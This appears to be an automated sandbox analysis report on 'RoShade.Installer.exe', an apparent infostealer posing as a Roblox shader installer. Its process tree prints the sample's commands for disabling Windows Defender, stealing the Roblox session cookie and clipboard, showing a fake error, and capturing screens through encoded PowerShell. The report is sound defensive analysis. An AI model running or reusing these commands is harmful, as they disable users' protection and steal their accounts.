Analysis

  • max time kernel
    4s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2024 15:07

General

  • Target

    RoShade.Installer.exe

  • Size

    5.8MB

  • MD5

    a009d18ad6b1ad27d3bfe34af2523c89

  • SHA1

    efe133b7259a700a1c838af989468ab65df1ca7b

  • SHA256

    be59ff484a7fa035caee41f9c6c70572250960f09768818b7cf9256013e2a007

  • SHA512

    9b33219a9b98eaa55a347cdd3a231e36c63d83653e2cda39cea36c3e4ffa1e4b45e317f4b15ceeb3c5a8933a996ace45fe3dc0524e1ab383a59df65126de5c38

  • SSDEEP

    98304:LimDSuXXOa7RHtJQi9UWvGfqD8WOxfmjaa15uXaDvdCK/blzFS03iw7FwXR6n3eX:LimDZtRHvUWvozWOxu9kXwvdbDlA03N4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 44 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe
    "C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:224
    • C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe
      "C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The following component(s) are required to run this program: DirectX Runtime .NET Framework 3.5 (includes .NET 2.0 and 3.0)', 0, 'Error', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The following component(s) are required to run this program: DirectX Runtime .NET Framework 3.5 (includes .NET 2.0 and 3.0)', 0, 'Error', 0+16);close()"
          4⤵
            PID:2884
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2520
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:5064
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2168
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:904
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
            PID:1028
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              4⤵
                PID:4664
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              3⤵
                PID:3260
                • C:\Windows\system32\reg.exe
                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                  4⤵
                    PID:4876
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                  3⤵
                    PID:3920
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic path win32_VideoController get name
                      4⤵
                      • Detects videocard installed
                      PID:4912
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                    3⤵
                      PID:4752
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic path win32_VideoController get name
                        4⤵
                        • Detects videocard installed
                        PID:4352
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                      3⤵
                        PID:3424
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4888
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                          PID:2548
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            4⤵
                            • Enumerates processes with tasklist
                            PID:3520
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          3⤵
                            PID:2952
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              4⤵
                              • Enumerates processes with tasklist
                              PID:1412
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                            3⤵
                              PID:1164
                              • C:\Windows\System32\Wbem\WMIC.exe
                                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                4⤵
                                  PID:4728
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                3⤵
                                • Clipboard Data
                                PID:1392
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-Clipboard
                                  4⤵
                                  • Clipboard Data
                                  PID:3024
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:2860
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    PID:1732
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2044
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:4488
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "systeminfo"
                                      3⤵
                                        PID:2740
                                        • C:\Windows\system32\systeminfo.exe
                                          systeminfo
                                          4⤵
                                          • Gathers system information
                                          PID:5000
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                        3⤵
                                          PID:4476
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                            4⤵
                                              PID:1708
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                            3⤵
                                              PID:1244
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                4⤵
                                                  PID:1472
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mntigwfl\mntigwfl.cmdline"
                                                    5⤵
                                                      PID:316
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90F5.tmp" "c:\Users\Admin\AppData\Local\Temp\mntigwfl\CSC8C932D46C55A410A9E5EA177879EEF5.TMP"
                                                        6⤵
                                                          PID:3028
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:3028
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:2408
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                        3⤵
                                                          PID:4912
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                                            4⤵
                                                            • Views/modifies file attributes
                                                            PID:736
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:3444
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:2276
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                              3⤵
                                                                PID:3636
                                                                • C:\Windows\system32\attrib.exe
                                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                  4⤵
                                                                  • Views/modifies file attributes
                                                                  PID:5064
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                3⤵
                                                                  PID:4608
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    4⤵
                                                                      PID:2044
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    3⤵
                                                                      PID:2648
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        tasklist /FO LIST
                                                                        4⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:4476
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                      3⤵
                                                                        PID:3348
                                                                        • C:\Windows\system32\tree.com
                                                                          tree /A /F
                                                                          4⤵
                                                                            PID:4588
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                          3⤵
                                                                            PID:5100
                                                                            • C:\Windows\system32\tree.com
                                                                              tree /A /F
                                                                              4⤵
                                                                                PID:3044
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                              3⤵
                                                                                PID:2884
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:3444
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                3⤵
                                                                                  PID:4376
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                    4⤵
                                                                                      PID:1928
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                                                    3⤵
                                                                                      PID:2304
                                                                                      • C:\Windows\system32\getmac.exe
                                                                                        getmac
                                                                                        4⤵
                                                                                          PID:4876

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                    SHA1

                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                    SHA256

                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                    SHA512

                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    572f120819a6e0628a9ff90d81ec7665

                                                                                    SHA1

                                                                                    934bd5dbc36c99d4305078f5e42a35bf587d161b

                                                                                    SHA256

                                                                                    bfe06994652dbaa3d7519ea097d34ec0101f40c311a11aa3434c1a01af00dda9

                                                                                    SHA512

                                                                                    7446b49aa6482ee4667fdfa02abb46c1ba9f2833ffe1248e03440181c4985f0a795db3dd02993db07071c74ff64b4f94ebfb40c3a7841f600e1b50288fdc335a

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    b51dc9e5ec3c97f72b4ca9488bbb4462

                                                                                    SHA1

                                                                                    5c1e8c0b728cd124edcacefb399bbd5e25b21bd3

                                                                                    SHA256

                                                                                    976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db

                                                                                    SHA512

                                                                                    0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

